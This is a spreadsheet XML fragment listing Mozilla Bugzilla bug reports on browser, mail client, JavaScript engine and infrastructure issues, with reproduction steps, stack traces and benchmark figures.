Reproducible: Always
Steps to Reproduce:
1. Open the example page: http://unixpapa.com/js/testkey.html
2. Press the Command-Key + A (or any of the keys mentioned above)
Actual Results:  
keyDown Event is fired for the Command-key but not for the A-key only onKeyUp event fires when you release the A-key.
Expected Results:  
CMD+A Should behave same like CTRL+A and fire the keyDown and keyPress event in JavaScript.
Keyboard events become more and more important for Web-Applications and really need to standardized at least the should work reliable.</t>
  </si>
  <si>
    <t>r.trost</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-466706</t>
  </si>
  <si>
    <t>Typo in Welcome to Shredder prose</t>
  </si>
  <si>
    <t>The new tab says:
   It could be that you've just downloaded or complied a build
complied is a typo of compiled</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-529008</t>
  </si>
  <si>
    <t>[hr] 3.6 whatsnew/firstrun localization</t>
  </si>
  <si>
    <t>THUNDERBIRD-476491</t>
  </si>
  <si>
    <t>Compose window opens with lower half 'blank' after specific steps</t>
  </si>
  <si>
    <t>Yes I know this falls into the category of Don't do that but is still a bug -)
The problem is that if you drag the splitter between the two halves of the compose window all the way to the bottom then close the compose window subsequent compose windows are 'blank' along the bottom and do not permit text to be entered.
To reproduce:
- New message (or reply to a message)
- Drag the splitter (between the two panes) all the way down.
- Close the compose window
- New message (or reply to a message)
- Note that the lower half of the message compose window is 'blank' and does not allow you to enter text (and in the case of a reply does not show any of the quoted text). (the bug)
- Drag the splitter up a tiny bit to 'reset' and show the body.</t>
  </si>
  <si>
    <t>jhorak</t>
  </si>
  <si>
    <t>TOOLKIT-286034</t>
  </si>
  <si>
    <t>Support Extension In/Uninstallation by simply adding/removing extension dir</t>
  </si>
  <si>
    <t>See http://wiki.mozilla.org/wiki/Firefox:1.1_Extension_Manager_Upgrades</t>
  </si>
  <si>
    <t>SEAMONKEY-451959</t>
  </si>
  <si>
    <t xml:space="preserve">Remove useless  from </t>
  </si>
  <si>
    <t>Bug 446281 comment 11:
[
Philip Chee   2008-08-13 18:43:42 PDT
while grepping through comm-central I noticed that debugQATextEditorShell.xul
pulls in contentAreaContextOverlay.xul for no apparent reason but that's grist
for another bug.
]</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-473594</t>
  </si>
  <si>
    <t>LDAP lookup configuration entries are corrupted</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.9.1b3pre) Gecko/20090114 Shredder/3.0b2pre
When I go to tools/options/Composition/Addressing and look at the LDAP configuration entries they are all mangled.  Only the name is correct all other entries including port base address etc are blank and the number of entries is 1 and set to individual and not subtree.
Attempting to edit the entries does nothing they always return to the blank setting.
Lookup against ldap therefore fails however lookups against local address books work normally.</t>
  </si>
  <si>
    <t>baffoni</t>
  </si>
  <si>
    <t>BUGZILLA-372589</t>
  </si>
  <si>
    <t>Firefox squishes bugsearch window making it difficult to use</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
When I go to bugzilla to report a bug in either Firefox or Mozilla
search results window (defaulting to top 100 when window initially displayed) is squished under firefox+.  It's only enough to display 1-line summaries of 4 bugs and is about 4cm high.
Under Opera and IE the window displays 17 and 12 bugs respectively  and have vertical heights of about 21 and 22 cm respectively.  The DPI is set the same (101) in all three browsers.
This makes perusal of the buglist difficult and frankly dissuades me from looking at very many bugs for duplicates (maybe whatever is in the first 2-3 scrolls on each browser or about 8 bugs on FF.  
Why is this window so darn small on FF?  It's weird that FF can't display full bug-result window on its own bug-manager but Opera and IE can display full size windows of nearly same height.  Theoretically I believe FF's window should be of similar height -- since the screen size is constant on all and the dpi is constant on all -- so whether or not it computes a window height based on an absolute height (say 21.5cm high) or a percent of screen height or percent of window height (windows are all roughly same height -- slightly smaller than screen height) they should be in same ball park but FF's windows are about 1 fifth the height of the other two browsers. 
I can't imagine this problem is limited to FF but I don't do side-by-sides on every webpage.  This example is especially in my face because it's the main entry for entering FF and TB bugs.
Slightly tangential suggestion -- maybe FF needs to do a bug-fix and code-cleanup *only* release -- maybe a redesign of code structure toward more optimality (assuming anyone has thought of more optimal structures if not nevermind on that! :-)).  It's just that I notice in many projects that features keep getting added on and at some point due to the way the code has developed a different structure/organization works better (smaller faster cleaner more internal orthogonality/less overlap&amp;duplication...etc). 
Only reason I side-comment is that sometimes bugs like this just fall out/disappear as a side effect of a code cleanup.  It may be the case that something in the code has systemically caused size problems due to a some programming model that doesn't quite fit the problem space.  The slightly odd fit might not have been a problem before but as a project expands a slight-misfit can grow into noticeable problem (a bit like a small pebble in a shoe feeling like a boulder after walking several miles).
Reproducible: Always
Steps to Reproduce:
1. I don't know that any specific steps are required.  I've haven't seen it work correctly since the shift to FF1.5 I /believe/.
2.
3.
Actual Results:  
small window gives portal sized view of ocean's worth of data
Expected Results:  
large window taking up large percentage of screen to allow me to view many bugs at one glance without having to scroll (since scrolling uses mouse and RSI problems make me mouse&amp;typing conservative).
I believe this has been present since shift to 1.5 though for sure since 2.0.
Incorrect sizing of this window is a major problem on this page and I believe may be an expression of other size issues in the code where it doesn't scale output widgets in accordance with text scaling.  Though in this specific case the problem appears to be exacerbated well beyond what is commonly the effect of text-widget scaling inconsistencies.</t>
  </si>
  <si>
    <t>CORE-67861</t>
  </si>
  <si>
    <t>Nested table relfow is slow (partly due to unnecessary max width calculations)</t>
  </si>
  <si>
    <t>When a nested table is reflowed and a change to a cell causes the table to be 
rebalanced it rebalances the table a 2nd time to figure the max width. This is 
not necessary because the 1st rebalancing should set enough state to be able to 
calculate the max width.</t>
  </si>
  <si>
    <t>BUGZILLA-166346</t>
  </si>
  <si>
    <t>set title attribute to bug summary for image maps in bug dependency graphs</t>
  </si>
  <si>
    <t>When webdotbase is set to a local executable bugzilla will greate a client side
image map for the dependency graph.  It would be nice if bugzilla output title
attributes for these image maps so that the bug summaries are visible on mouse over.
This would give a nice compromise between not showing summaries (which gives a
decent size dependency graph but not much info) and showing the summaries
(which makes the graph a lot bigger).</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-391248</t>
  </si>
  <si>
    <t>Need win32 buildslave for Mozilla2</t>
  </si>
  <si>
    <t>We need a Windows VM to act as a buildslave for building Mozilla2.</t>
  </si>
  <si>
    <t>CORE-90954</t>
  </si>
  <si>
    <t>nsXMLElement::CreateElementNS() doesn't create the correct content elements</t>
  </si>
  <si>
    <t>For XML documents if you use create a new node using document.createElementNS
(...) either a HTML- or generic XML-element is constructed. Other element 
factories are ignored. In compound documents such as SVG+XHTML this makes it 
impossible to dynamically construct new SVG nodes.
It works fine in XUL documents though.</t>
  </si>
  <si>
    <t>CORE-455235</t>
  </si>
  <si>
    <t>spellchecker doesn't choose the correct locale dictionary in Firefox</t>
  </si>
  <si>
    <t>When the spellchecker is enabled the first time it should default to the current used locale:
http://mxr.mozilla.org/mozilla/source/editor/composer/src/nsEditorSpellCheck.cpp#194
But
rv = packageRegistry-&gt;GetSelectedLocale(NS_LITERAL_CSTRING(editor)
                                               utf8DictName)
fails for me and therefore en-US (as first in the list) is used always.
I found that 
http://mxr.mozilla.org/mozilla/source/chrome/src/nsChromeRegistry.cpp#799
fails to get an entry for editor but I couldn't figure out why or which data is loaded into mPackagesHash.
(I'm using a self-compiled build but I'm not sure if that makes a difference)</t>
  </si>
  <si>
    <t>MARKETPLACE_GRAVEYARD-888662</t>
  </si>
  <si>
    <t>Consumer Pages</t>
  </si>
  <si>
    <t>Add support for persistent logs</t>
  </si>
  <si>
    <t>The log module should be updated to allow for persistent logging in this way:
var persist_console = log.persistent('foo')
var console = log('foo')
Persistent logs should be stored using the storage module. They should be accessible via:
&gt;&gt;&gt; var logs = log.persistent.raw
&gt;&gt;&gt; logs
{foo: [...] bar: [...]}</t>
  </si>
  <si>
    <t>NSS-230761</t>
  </si>
  <si>
    <t>RFE: accept additional OIDs to signify RSA sigantures</t>
  </si>
  <si>
    <t>As reportted in bug 214602 and others some SMIME email programs create 
signed messages where the digestEncryptionAlgorithm OID in the signerInfo
contains the OID
    2A 86 48 86 F7 0D 01 01 05
    Description = sha1withRSAEncryption (1 2 840 113549 1 1 5) (PKCS #1)
mozilla expects to receive this OID instead:
    2A 86 48 86 F7 0D 01 01 01
    Description = rsaEncryption (1 2 840 113549 1 1 1) (PKCS #1)
I believe that mozilla's behavior is correct here.  That is given that 
a signature contains a SHA1 digest encrypted with PKCS1 RSA I believe
the correct value to use for digestEncryptionAlgorithm is the one that
mozilla expects.  
However In the spirit of the old Internet maxim:
   Be generous in what you accept but strict in what you send.
I think that we could change NSS to also accept this other OID without 
introducing any great security weakness.  I will attach a patch that
implements that tiny change.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-484413</t>
  </si>
  <si>
    <t>move fx-win32-1.9-slave07 and 08 to production</t>
  </si>
  <si>
    <t>These machines don't appear to be based on the win32 ref platform at all. They don't even have d: or e: drives. More importantly they have been consistently failing to build causing permanent bustage on the Firefox3.0 tree.</t>
  </si>
  <si>
    <t>FIREFOX-417904</t>
  </si>
  <si>
    <t>Focus ring can end up on an inactive tab and is missing on Mac</t>
  </si>
  <si>
    <t>Bug 303428 was filed as a Firefox bug and has recently been moved to Core. That's good but for the tabbrowser tabs there's still a simple workaround that we should use until that bug is fixed.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-167070</t>
  </si>
  <si>
    <t>gilan.nl - images not showing on some pages</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1b) Gecko/20020905
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1b) Gecko/20020905
I read something about profiles and that person seemed to have the same problem.
But i do not use profiles. All settings are default.
Loading the above mentioned page (or subpages) shows only some images. Using IE
5.5 it shows the (all) images correctly.
Reproducible: Always
Steps to Reproduce:
1. open the URL and see yourself
2. otherwise open any subpage
3.
Actual Results:  
gotten a page with lines marking the area that should show the image. But
instead of showing the image it shows placemarkers in the upper left corner of
the boxes that define the area reserved for displaying the images.
Expected Results:  
shown the images correctly
as far as i know i have not changed any default settings other than e-mail
information and proxy and cache settings.
But i can not see the relevance at this point to these settings.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-512184</t>
  </si>
  <si>
    <t>Mailing list for spreadfirefox.stage.m.c</t>
  </si>
  <si>
    <t>Hey
Could you please set up a sfx.stage@mozilla.com mailing list?
Email captured from spreadfirefox.stage.m.c will be sent to this list for dev. and testing purposes per bug 505344
Thanks</t>
  </si>
  <si>
    <t>CORE-508774</t>
  </si>
  <si>
    <t>nsGlobalModalWindow traverses mArguments twice</t>
  </si>
  <si>
    <t>Created attachment 392911
v1
nsGlobalModalWindow traverses mArguments which is already traversed in its base class (nsGlobalWindow). This means the cycle collector might be collecting live objects. It doesn't traverse its own member mReturnValue but does unlink it.
I found this from code inspection and I don't have a testcase so no idea how bad it is. We should be nulling out pointers when unlinking so I don't think we'll end up with stale pointers.</t>
  </si>
  <si>
    <t>SEAMONKEY-444157</t>
  </si>
  <si>
    <t>[Proxy] Migrate SeaMonkey's Proxies preferences to new pref window</t>
  </si>
  <si>
    <t>As well as migrating would be good to do some tidy up and implement the SM equivalent of bug 416274</t>
  </si>
  <si>
    <t>CORE-453747</t>
  </si>
  <si>
    <t>TM: Assertion failure: JSVAL_IS_VOID(boxed) || JSVAL_IS_BOOLEAN(boxed) (typeof dense array holes?)</t>
  </si>
  <si>
    <t>./js -j
(function(){
  var a = []
  var s = 10
  for (var i = 0 i &lt; s ++i)
    a[i] = 1
  a[4*s-1] = 2
  for (var i = s+1 i &lt; s+4 ++i)
    typeof a[i]
})()
Assertion failure: JSVAL_IS_VOID(boxed) || JSVAL_IS_BOOLEAN(boxed) at jsbuiltins.cpp:621
This bug exists on mozilla-central and tracemonkey branch.  Based on the sensitivity to the line a[4*s-1] I'm guessing the array has to be dense for the assertion to fire.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-242886</t>
  </si>
  <si>
    <t>Mozilla Mail freezes and starts using 100% CPU when I try to display Trash folder</t>
  </si>
  <si>
    <t>I'm using Mozilla nightly 20040506 on Windows XP Pro with SP1.
When I try to open my Trash folder Mozilla just freezes and it starts using 100%
of CPU (I have AMD Athlon 64 3000+). When I try to close the Mail window Windows
then displays a message that Mozilla crashes. In details it says it crashed in:
szAppName : mozilla.exe     szAppVer : 1.8.20040.50609     
szModName : msgbase.dll     szModVer : 0.0.0.0     offset : 0002a3b6
or:
szAppName : mozilla.exe     szAppVer : 1.8.20040.50609     szModName : msgdb.dll
szModVer : 1.8.20040.50609     offset : 000035c2
I tried this several times and it always freezes and crashes on exit.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-514315</t>
  </si>
  <si>
    <t>undeclared variables on stats tab</t>
  </si>
  <si>
    <t>getting these in the error console:
Warning: assignment to undeclared variable weekly
Source File: chrome://qa/content/tabs/stats.js
Line: 78
for a bunch of variables.</t>
  </si>
  <si>
    <t>CORE-471020</t>
  </si>
  <si>
    <t>DOM: Security</t>
  </si>
  <si>
    <t>Add X-Content-Type-Options: nosniff support to Firefox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)
X-Content-Type-Options: nosniff is introduced by the IE Team to disable MIME-sniffing (http://blogs.msdn.com/ie/archive/2008/09/02/ie8-security-part-vi-beta-2-update.aspx). Firefox should support this to disable MIME-sniffing.
Reproducible: Always
Steps to Reproduce:
1. Open http://franklin.pacificstorms.org/IE8-Test/authoritativeMIME.php
Actual Results:  
Feed reading view is displayed
Expected Results:  
A XML DOM tree is displayed</t>
  </si>
  <si>
    <t>ckerschb</t>
  </si>
  <si>
    <t>FranklinWhale</t>
  </si>
  <si>
    <t>CORE-166143</t>
  </si>
  <si>
    <t>Cookies with quotes around the max-age value expire immediately</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.1) Gecko/20020826
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.1) Gecko/20020826
Mozilla doesn't seem to be able to handle this format of Cookie where as IE and
Opera do.
This is a RFC2109 style cookie.
http://www.cis.ohio-state.edu/cgi-bin/rfc/rfc2109.html
This code is used for session management may be similar to broken session
management cookies used on other sites.
The only other possibility could be that it's immediately expiring the cookie.
Reproducible: Always
Steps to Reproduce:
1. Visit Supplied URL
2. Can also visit http://guide.keenspace.com/cgi-bin/cookie_read.cgi to see if
the cookie can be read back
Actual Results:  
Although the this site wants to set a cookie message comes up and is told to
allow the cookie actually checking the cookie manager reveals no cookies.
Expected Results:  
Mozilla should accept RFC2109 cookies
Does the same thing on a Linux build.</t>
  </si>
  <si>
    <t>kisai_z</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-827209</t>
  </si>
  <si>
    <t>reactivate hg for mconnor@mozilla.com</t>
  </si>
  <si>
    <t>need to check some stuff in!</t>
  </si>
  <si>
    <t>WEBTOOLS-949119</t>
  </si>
  <si>
    <t>Air Mozilla</t>
  </si>
  <si>
    <t>Air Mozilla should post to @airmozilla on twitter when recordings become available</t>
  </si>
  <si>
    <t>I notice @airmozilla exists on twitter and hasn't been used in a while.  We should start using it again.  A really good use of it would be to post when recordings because available for public events.</t>
  </si>
  <si>
    <t>peterbe</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-318203</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/products/firefox/switch</t>
  </si>
  <si>
    <t>quadc89</t>
  </si>
  <si>
    <t>TOOLKIT-300970</t>
  </si>
  <si>
    <t>access checks for install locations are performed repeatedly per location during a session</t>
  </si>
  <si>
    <t>canAccess tests write access for each install location by creating a test
directory and then deleting it. Since an install location usually contains
multiple items this causes the same location to be tested for write access
repeatedly. I have a patch in progress and should have it finished by the end of
the weekend.</t>
  </si>
  <si>
    <t>WEBSITES-432483</t>
  </si>
  <si>
    <t>Update blog feed</t>
  </si>
  <si>
    <t>I recently moved to a new domain. 
From http://cesarmoco.wordpress.com/ to
http://www.cesaroliveira.net/tea/archives/tag/mozilla/feed
Thanks
Cesar Oliveira</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-506141</t>
  </si>
  <si>
    <t>Can't log in on a new account (no pub/privkey to verify)</t>
  </si>
  <si>
    <t>verifyPassphrase assumes the user has keys on the server to verify. If the server is empty it will fail.</t>
  </si>
  <si>
    <t>anant</t>
  </si>
  <si>
    <t>CORE-514986</t>
  </si>
  <si>
    <t>Remove unused nsChildView::SetBounds</t>
  </si>
  <si>
    <t>Created attachment 399011
v1
SetBounds is an nsBaseWidget convenience method for setting the mBounds variable it doesn't need to be overridden. It's only used by the os2 nsWindow.cpp IIRC.</t>
  </si>
  <si>
    <t>CORE-511316</t>
  </si>
  <si>
    <t>TM: Current SunSpider Performance Comparison</t>
  </si>
  <si>
    <t>From = Tracemonkey
To   = WebKit
TEST                   COMPARISON            FROM                 TO         
=============================================================================
** TOTAL **:           1.72x as fast     748.5ms +/- 0.2%   435.3ms +/- 0.4%  
=============================================================================
  3d:                  2.00x as fast     113.2ms +/- 0.5%    56.6ms +/- 0.9%  
    cube:              1.84x as fast      30.2ms +/- 1.0%    16.4ms +/- 2.3%  
    morph:             -                  22.3ms +/- 1.5%    22.0ms +/- 2.2% 
    raytrace:          3.34x as fast      60.7ms +/- 0.6%    18.2ms +/- 1.7%  
  access:              2.32x as fast     110.9ms +/- 0.4%    47.7ms +/- 1.4%  
    binary-trees:      5.67x as fast      31.2ms +/- 1.0%     5.5ms +/- 9.2%  
    fannkuch:          2.67x as fast      49.7ms +/- 0.7%    18.6ms +/- 2.0%  
    nbody:             1.42x as fast      18.5ms +/- 2.0%    13.0ms +/- 0.0%  
    nsieve:            1.085x as fast     11.5ms +/- 3.3%    10.6ms +/- 3.5%  
  bitops:              1.171x as fast     30.1ms +/- 1.8%    25.7ms +/- 1.3%  
    3bit-bits-in-byte: *2.73x as slow*     1.5ms +/- 25.1%     4.1ms +/- 5.5%  
    bits-in-byte:      -                  7.3ms +/- 4.7%     7.1ms +/- 3.2% 
    bitwise-and:       *2.27x as slow*     2.2ms +/- 13.7%     5.0ms +/- 0.0% 
    nsieve-bits:       2.01x as fast      19.1ms +/- 1.2%     9.5ms +/- 4.0%  
  controlflow:         7.07x as fast      29.0ms +/- 0.0%     4.1ms +/- 5.5%  
    recursive:         7.07x as fast      29.0ms +/- 0.0%     4.1ms +/- 5.5%  
  crypto:              1.57x as fast      45.1ms +/- 1.2%    28.8ms +/- 2.0%  
    aes:               1.71x as fast      25.0ms +/- 2.3%    14.6ms +/- 2.5%  
    md5:               1.71x as fast      13.0ms +/- 0.0%     7.6ms +/- 4.9%  
    sha1:              1.076x as fast      7.1ms +/- 3.2%     6.6ms +/- 5.6%  
  date:                1.90x as fast     110.1ms +/- 0.6%    57.8ms +/- 0.5%  
    format-tofte:      2.02x as fast      52.6ms +/- 0.7%    26.0ms +/- 0.0%  
    format-xparb:      1.81x as fast      57.5ms +/- 0.7%    31.8ms +/- 0.9%  
  math:                *1.47x as slow*    25.9ms +/- 2.0%    38.0ms +/- 0.0%  
    cordic:            *1.43x as slow*     9.1ms +/- 2.5%    13.0ms +/- 0.0%  
    partial-sums:      *1.59x as slow*    11.3ms +/- 3.1%    18.0ms +/- 0.0%  
    spectral-norm:     *1.27x as slow*     5.5ms +/- 6.8%     7.0ms +/- 0.0%  
  regexp:              1.58x as fast      34.2ms +/- 0.9%    21.7ms +/- 1.6%  
    dna:               1.58x as fast      34.2ms +/- 0.9%    21.7ms +/- 1.6%  
  string:              1.61x as fast     250.0ms +/- 0.3%   154.9ms +/- 0.6%  
    base64:            *1.23x as slow*    14.3ms +/- 2.4%    17.6ms +/- 2.1%  
    fasta:             1.63x as fast      50.9ms +/- 0.4%    31.2ms +/- 1.0%  
    tagcloud:          2.34x as fast      80.9ms +/- 0.8%    34.5ms +/- 1.1%  
    unpack-code:       1.78x as fast      79.8ms +/- 0.4%    44.9ms +/- 0.5%  
    validate-input:    *1.108x as slow*   24.1ms +/- 0.9%    26.7ms +/- 1.8%</t>
  </si>
  <si>
    <t>wagnerg</t>
  </si>
  <si>
    <t>THUNDERBIRD-498735</t>
  </si>
  <si>
    <t>rmtree doesn't remove read-only files on Windows</t>
  </si>
  <si>
    <t>Created attachment 383541
patch
rmtree doesn't cope with read-only files on Windows so do it ourselves.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-321167</t>
  </si>
  <si>
    <t>viewer crashes at launch</t>
  </si>
  <si>
    <t>someone added initxpcom3 which kinda fails if you've already initxpcom2'd.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-219936</t>
  </si>
  <si>
    <t>No new (or sporadic) Win32 builds due to issues around transition to new servers.</t>
  </si>
  <si>
    <t>There has not been any win32 builds either installer or zip since BuildID
2003091704.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-22373</t>
  </si>
  <si>
    <t>final blocker test</t>
  </si>
  <si>
    <t>Test 123</t>
  </si>
  <si>
    <t>CORE-176030</t>
  </si>
  <si>
    <t>Crash when attempting to print.  Nothing prints out. [@ nsTableCellFrame::Reflow]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2b) Gecko/20021016
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2b) Gecko/20021014 Netscape/7.0+
Tested on Windows Me Windows 98 Windows 2000 and Windows XP.
Repeatable on a P3 and a Celeron box.
Using Build 2002101404 go to the following sites and try to print them:
www.sonystyle.com
www.techweb.com 
www.usairways.com (does not crash when using W2000 or XP)
www.nytimes.com (does not crash when using W2000 or XP)
www.grolier.com (does not crash when using W2000 or XP)
www.half.com (does not crash when using W2000 or XP)
www.noaa.gov (does not crash when using W2000 or XP) 
Expected result: Print site
Actual result: Browser crashes after clicking on OK to print site. 
Talkback loads and is able to send info back most of the time. Site does not get
printed except for www.noaa.gov which has the first page printed out before
crashing.
Reproducible: Always
Steps to Reproduce:
1.Go to the mentioned URL's
2.Once the page is loaded click on the print icon use ctrl+p or file-print
3.Watch it crash :-(
Actual Results:  
Mozilla crashes. Sometimes NS Quality Feedback Agent pop up. (sorry could not
find Talkback ID - if there was one)
Expected Results:  
Print out the site.
Also got the same results on celeron box using Win XP and Mozilla/5.0 (Windows
U Windows NT 5.1 en-US rv 1.2b) Gecko/2002101612</t>
  </si>
  <si>
    <t>gushardt</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-415556</t>
  </si>
  <si>
    <t>search plug in review for Fx3 for Brazil (pt-BR)</t>
  </si>
  <si>
    <t>it appears team wants to change the order of the search plug ins. please verify the order here and let's use this bug to track to get us in a good spot for B4.
it appears that the order you suggest if
1 google
2 yahoo
3 wikipedia (brazil)
then I assume
4 buscape
5mercado livre
please verify thanks</t>
  </si>
  <si>
    <t>CORE-783206</t>
  </si>
  <si>
    <t>replace NULL with nullptr in intl except to OS API usages</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-397819</t>
  </si>
  <si>
    <t>Microsummaries uses e4x Namespace objects when it shouldn't</t>
  </si>
  <si>
    <t>The two consts at the top of the file are passed to things like getElementsByTagNameNS which take string args.</t>
  </si>
  <si>
    <t>CORE-204545</t>
  </si>
  <si>
    <t>Remove XMLHttpRequest event listeners when needed</t>
  </si>
  <si>
    <t>While working on bug 177533 I first thought fixing the final case of memory leak
would be a lot of work with lots of regression possibilities. One idea was to
not have listener members in the C++ interface itself but check if JS had set
those properties on the wrapper and call them when needed. It turns out none of
that is needed.
IE's similar object seems to clear it's event listeners at certain points. After
the first call has been sent one needs to call open() set event listeners and
call send() in exactly that order to reuse the same object. Specifically if
after first response you try to set event listeners call open() send()
nothing will happen. So it seems the second and subsequent open() calls act as a
kind of a reset. You cannot check the values of event listeners on this object
in IE. I also noticed that if you try to do an asynchronous call without an
event listener set nothing happens.
I propose that we should clear event listeners after receiving response which
gets rid of the remaining reference cycle (memory leak) and brings us more on
par with IE's implementation.
To get fully on par with IE we should refuse to set event listeners after the
first response is received unless open() has been called first. I am not 100%
sure we should do this as it feels a bit like a bug in IE but I can not be
sure  - in other words it might be like this for a valid reason. I will point
out this part of the fix in the comments of the patch.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-439266</t>
  </si>
  <si>
    <t>Leak of array if rv != NS_OK in BuildSearchElements()</t>
  </si>
  <si>
    <t>BuildSearchElements() in nsAbOSXDirectory.mm will leak an NSArray and all its items if it's returning early with NS_ENSURE_SUCCESS(rv rv).
Fix coming up.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-112259</t>
  </si>
  <si>
    <t>stadshypotek.se - blocks Mozilla/Netscape6</t>
  </si>
  <si>
    <t>Stadshypotek a Swedish financial institution blocks Mozilla/Netscape6 Opera
and Konqueror. The site uses server-side user-agent sniffing and will not
provide a frameset to these browsers. The site uses document.layer and document.all.
The site is technically very similar to http://www.handelsbanken.se/ which is
no coincidence since Stadshypotek is part of the Handelsbanken group.</t>
  </si>
  <si>
    <t>per.angstrom</t>
  </si>
  <si>
    <t>CORE-422744</t>
  </si>
  <si>
    <t>For ARIA menupopup focus event for new menuitem must be after menupopupstart event</t>
  </si>
  <si>
    <t>http://archive.dojotoolkit.org/nightly/dojotoolkit/dijit/test/form/test_Button.html
Tab to save button dropmarker and hit Enter. The MSAA focus event for the Save menuitem should occur after the menupopupstart.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-534598</t>
  </si>
  <si>
    <t>Please merge BenB's two bugzilla accounts</t>
  </si>
  <si>
    <t>I have 2 bugzilla accounts mozilla bucksch.org and ben.bucksch beonex.com. The split of personality predates the bugzilla feature to change the email address IIRC and I used the 2 accounts to split paid and voluntary work but the split no longer makes sense. I currently use the beonex account only.
Could you merge the 2 accounts please?
Meaning replacing any instances of mozilla@bucksch.org with ben.bucksch@beonex.com  in assignments cc-s and comments - in the DB i.e. also in the history. (And requests and privs if mozilla bucksch.org has any.)
Thanks a lot!
Ben</t>
  </si>
  <si>
    <t>CORE-312880</t>
  </si>
  <si>
    <t>text-align center / right for submit Button does not work when min-width is used</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b5) Gecko/20051018
Firefox/1.4.1 ID:2005101805
testcase next</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-463833</t>
  </si>
  <si>
    <t>Ãœbersetzungen zu bug 248970 - Private Browsing (download manager)</t>
  </si>
  <si>
    <t>Ich Ã¼bersetze gerade die Strings zu Private Browsing im Downloadmanager und mir bereitet schon der Ausdruck fÃ¼r das Feature Kopfzerbrechen. Ich lasse den Namen der Funktion mal praktisch unÃ¼bersetzt Attachment mit meinen Ã„nderungen folgt.</t>
  </si>
  <si>
    <t>CORE-391243</t>
  </si>
  <si>
    <t>Various crashes [@ _moz_cairo_status] [@ _moz_cairo_surface_get_type] [@ _cairo_array_num_elements]</t>
  </si>
  <si>
    <t>Created attachment 275622
Patch rev. 1
We have many reported Breakpad crashes with _moz_cairo* on the stack
a number of these seems to be a null surface or possibly a surface
that we failed to setup properly (CairoStatus() != 0).
https://crash-reports.mozilla.com/reports/?do_query=1&amp;query_search=stack&amp;query_type=contains&amp;query=_moz_cairo&amp;date=&amp;range_value=3&amp;range_unit=months
(only some of these are due to this bug of course)
The patch adds some error handling that avoids crashing in this situation.</t>
  </si>
  <si>
    <t>CORE-180217</t>
  </si>
  <si>
    <t>nsXULDocument::~nsXULDocument will crash if mDocumentURL is null</t>
  </si>
  <si>
    <t>nsXULPrototypeCache::nsIURIKey::HashCode() line 135 + 21 bytes
nsHashtable::Remove(nsHashKey * 0x0012e1e8) line 322 + 11 bytes
nsSupportsHashtable::Remove(nsHashKey * 0x0012e1e8 nsISupports * * 0x00000000)
line 984 + 12 bytes
nsXULPrototypeCache::RemoveFromFastLoadSet(nsXULPrototypeCache * const
0x016df390 nsIURI * 0x00000000) line 631
nsXULDocument::~nsXULDocument() line 533
nsXULDocument::`scalar deleting destructor'() + 15 bytes
nsXULDocument::Release(nsXULDocument * const 0x01d4c3f0) line 575 + 186 bytes
XPCWrappedNative::~XPCWrappedNative() line 547 + 18 bytes
XPCWrappedNative::`scalar deleting destructor'(unsigned int 1) + 15 bytes
XPCWrappedNative::Release(XPCWrappedNative * const 0x01d4d6a0) line 777 + 147 bytes
XPCWrappedNative::FlatJSObjectFinalized(JSContext * 0x004f4e70 JSObject *
0x0141f310) line 897
XPC_WN_NoHelper_Finalize(JSContext * 0x004f4e70 JSObject * 0x0141f310) line 630
js_FinalizeObject(JSContext * 0x004f4e70 JSObject * 0x0141f310) line 1840 + 96
bytes
js_GC(JSContext * 0x004f4e70 unsigned int 5) line 1311 + 11 bytes
-	mDocumentURL	{...}
\+	mRawPtr	0x00000000
There is a real way this could happen in addition to the way i forced it to
happen the real way is:
(you're really low on memory)
you call NS_NewXULDocument for the first time
    nsXULDocument* doc = new nsXULDocument()
succeeds
    if (NS_FAILED(rv = doc-&gt;Init())) {
Init fails.
        NS_RELEASE(doc)
Crash.
There are probably other ways this can fail. but I felt brendan would appreciate
a legitimate sequence.</t>
